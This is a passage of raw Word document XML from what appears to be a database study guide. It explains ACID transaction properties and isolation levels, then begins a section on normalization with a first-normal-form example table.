      </w:r>
    </w:p>
    <w:p w14:paraId="485EBB12"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UPDATE inventory SET quantity = quantity - 1 WHERE item_id = 500;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753B6AD1"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In case of failure, the system will roll back to the state before the transaction, ensuring consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037DC67F" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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ACEFF29">
          <v:rect id="_x0000_i2970" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B349F47"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3. Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCF0F8D"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Isolation ensures that the operations of a transaction are isolated from other transactions. Even though multiple transactions may be executed concurrently, each transaction should behave as if it is the only transaction in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E948D3C"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Key Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Isolation prevents issues like </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dirty reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reading uncommitted data), </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-repeatable reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data changing between reads), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phantom reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (new rows being inserted by other transactions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FAF7C3"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If one transaction is updating the balance of a bank account, it should not be interfered with by another transaction attempting to read or modify the same data at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFB9D3"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688A027"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Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures transactions are executed serially (one at a time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274E376"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Repeatable Read</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Guarantees that a transaction reads the same data multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09472A45"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Read Committed</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that a transaction can only read committed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D4B0C"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Isolation levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A4C4C2"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Read Uncommitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows dirty reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CFF32"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Read Committed</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads but allows non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45770E42"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Repeatable Read</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads and non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036AE5CD"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Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents dirty reads, non-repeatable reads, and phantom reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEAB8F" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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21F97C4">
          <v:rect id="_x0000_i2971" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63086EBB"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4. Durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CD758"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Durability guarantees that once a transaction has been committed, it will survive permanently, even in the event of a system failure (e.g., power loss, crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172E3BE3"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Key Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After a transaction is successfully committed, its changes are permanent and stored in non-volatile memory (disk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC4309"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a bank transfer is committed, even if the system crashes immediately after, the transferred amount will be reflected in the accounts when the system is restored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864ACBA"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the COMMIT command is issued after a transaction, the database will ensure that the data is written to disk and will not be lost, even in case of crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59432A18" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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10E2C2B">
          <v:rect id="_x0000_i2972" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2C259"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Summary of ACID Propert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9"/>
        <w:gridCol w:w="7043"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5B712B2A" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D68BD3"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Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BF000A"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="21CBE5A8" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F91D88E"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Atomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392D8173"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The transaction is atomic (either all operations are completed, or none).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="7A5C359B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26361F72"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Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056121D9"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The database remains in a consistent state before and after the transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="74F3FEB1" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8168DB"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Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A0629E"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Transactions are isolated from each other to avoid concurrency issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="29C6FC30" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7ECE73"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urability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC2FF3F"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Once a transaction is committed, it is permanent and survives system failures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51C59148"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These properties ensure the reliability and integrity of a database, even in complex scenarios involving multiple transactions. ACID compliance is essential for applications requiring high consistency, such as banking, e-commerce, and financial systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140DEEA4" w14:textId="44FE7324" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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8F6F414">
          <v:rect id="_x0000_i2973" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9A6A5" w14:textId="1A54FD45" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="001235B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="710" w:name="_Toc196308190"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explain Normalization</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="710"/>
    </w:p>
    <w:p w14:paraId="792FEF17" w14:textId="5159E09E" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="00393B05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Normalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process of organizing data in a relational database to minimize redundancy and dependency by dividing large tables into smaller ones and defining relationships among them. The main goal of normalization is to ensure that the database structure is efficient, and that the data remains consistent and flexible for future operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF433F3"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Normalization is done by applying a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>normal forms (NF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the database tables. These normal forms reduce the potential for data anomalies such as redundancy, update anomalies, and insert anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979CF03"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Here’s a breakdown of the normalization process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110788D9"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1. First Normal Form (1NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919AFBE"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A table is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it meets the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977EDBC" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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All columns must contain atomic (indivisible) values, meaning no repeating groups or arrays in a single column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7F361" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Each record must be unique (no duplicate rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65709EE9"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Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminate repeating groups and ensure that each field contains only one value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D4635"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Non-1NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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25"/>
        <w:gridCol w:w="1556"/>
        <w:gridCol w:w="1195"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0DA32877" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42CB38DE"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Employee ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09517FC8"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Employee Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169FDB0C"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Skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0E0B3DC2" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47540D2F"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E8AA780"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2848DB21"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Java, Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="41DE569B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="604CFADD"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0440E3C1"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486E1311"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Java, SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09AD5393"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1NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after splitting the skills into separate row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25"/>
        <w:gridCol w:w="1556"/>
        <w:gridCol w:w="710"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2891A5BC" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596BEB05"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Employee ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C23F6A3"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Employee Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB97A32"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Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="39768C7B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="768FE167"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C730E5"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
